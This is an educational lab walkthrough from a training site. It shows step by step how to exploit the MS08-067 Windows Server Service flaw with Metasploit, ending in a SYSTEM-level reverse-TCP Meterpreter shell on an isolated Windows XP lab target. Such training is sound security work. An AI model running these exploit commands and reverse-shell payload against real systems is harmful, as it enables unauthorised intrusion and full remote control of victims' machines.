LabEx
Log InJoin Free

Exploit MS08-067 on a Windows XP Target in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn how to use the Metasploit Framework to exploit one of the most well-known Windows vulnerabilities, MS08-067. This vulnerability exists in the Server Service on Windows systems and can allow for remote code execution.

You will use Metasploit, a powerful penetration testing tool, to select, configure, and launch an exploit against a target Windows XP machine. By the end of this lab, you will have gained a Meterpreter session on the target, giving you remote control.

For this lab, the environment is pre-configured with two machines:

  • Your attacker machine (this Ubuntu VM), with IP address 192.168.1.100.
  • A vulnerable Windows XP target machine, with IP address 192.168.1.101.

You will perform all actions from the terminal on your attacker machine.

Select the ms08_067_netapi exploit module

In this step, you will launch the Metasploit console and select the appropriate exploit module for the MS08-067 vulnerability.

First, open a terminal. All commands will be executed here. The Metasploit Framework comes with a command-line interface called msfconsole. Let's start it with the -q (quiet) flag to suppress the banner.

msfconsole -q

Once it loads, you will see the Metasploit prompt, which looks like msf6 >. Now, you can search for the exploit module related to ms08-067.

search ms08-067

You will see a list of matching modules. The one we are interested in is exploit/windows/smb/ms08_067_netapi.

Matching Modules
================

   ##  Name                                 Disclosure Date  Rank       Check  Description
   -  ----                                 ---------------  ----       -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

To use this exploit, type the use command followed by the name of the module.

use exploit/windows/smb/ms08_067_netapi

Your prompt will change to indicate that you are now inside the context of this specific exploit module.

msf6 exploit(windows/smb/ms08_067_netapi) >

Set the RHOSTS option to the Windows XP target

In this step, you will configure the exploit module by setting the target's IP address. Most exploits need to know who to attack. In Metasploit, the target address is set using the RHOSTS (Remote Hosts) option.

First, let's view the available options for this exploit using the show options command.

show options

You will see a table of options you can configure. Notice that RHOSTS is required but is not yet set.

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The target port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

...

Now, set the RHOSTS option to the IP address of our Windows XP target, which is 192.168.1.101.

set RHOSTS 192.168.1.101

Metasploit will confirm the change.

RHOSTS => 192.168.1.101

You have now told Metasploit which machine to target.

Select a reverse TCP payload like windows/meterpreter/reverse_tcp

In this step, you will select a payload to be delivered to the target system after a successful exploit. A payload is the code that will run on the target machine. We will use Meterpreter, which is a powerful and flexible payload that provides an interactive shell.

The windows/meterpreter/reverse_tcp payload will force the compromised target machine to connect back to you (the attacker). This is often more successful in real-world scenarios where firewalls might block direct connections to the target.

To set the payload, use the set payload command.

set payload windows/meterpreter/reverse_tcp

Metasploit will confirm that the payload has been set.

payload => windows/meterpreter/reverse_tcp

Now that the payload is selected, you will need to configure its options in the next step.

Set the LHOST and LPORT payload options

Now that you've selected a reverse payload, you need to configure it to connect back to your machine. This requires setting two main options: LHOST and LPORT.

  • LHOST (Local Host): This is your attacker machine's IP address, where the payload should connect back to.
  • LPORT (Local Port): This is the port on your machine that will listen for the incoming connection from the target.

As mentioned in the introduction, your attacker machine's IP is 192.168.1.100. Let's set LHOST to this value.

set LHOST 192.168.1.100

You will see a confirmation:

LHOST => 192.168.1.100

Next, let's set the listening port. A common choice is 4444.

set LPORT 4444

Again, you will see a confirmation:

LPORT => 4444

You can run show options again to verify that all required options (RHOSTS, LHOST, LPORT) are now correctly set.

Run the exploit and get a Meterpreter session

With all options configured, you are now ready to launch the exploit. This is the final step where you will attempt to compromise the target system.

To launch the attack, simply use the exploit command.

exploit

Metasploit will now attempt to exploit the vulnerability. If successful, you will see output similar to the following. It will automatically detect the target OS, send the exploit, and then send the payload.

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Automatically detecting the target...
[*] 192.168.1.101:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.101:445 - Selected Target: Windows XP SP3 English (AlwaysOn)
[*] 192.168.1.101:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1035) at 2023-10-27 10:30:00 -0400

meterpreter >

Notice the last line: Meterpreter session 1 opened. Your command prompt has changed to meterpreter >. This means you have successfully compromised the target and have an active session.

To verify your access, run a command like getuid to see what user you are running as on the target system.

getuid

The output will show that you have the highest level of privileges.

Server username: NT AUTHORITY\SYSTEM

Congratulations, you have successfully exploited MS08-067!

Summary

In this lab, you successfully used the Metasploit Framework to exploit the MS08-067 vulnerability on a Windows XP target.

You followed the fundamental workflow of a penetration test:

  1. Selected a specific exploit module (exploit/windows/smb/ms08_067_netapi).
  2. Configured the exploit by setting the target's address (RHOSTS).
  3. Chose a payload (windows/meterpreter/reverse_tcp) to gain control.
  4. Configured the payload with your local host and port (LHOST, LPORT).
  5. Launched the exploit and gained a high-privilege Meterpreter session on the target.

This exercise demonstrates the power and simplicity of using a framework like Metasploit to test for and exploit system vulnerabilities.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux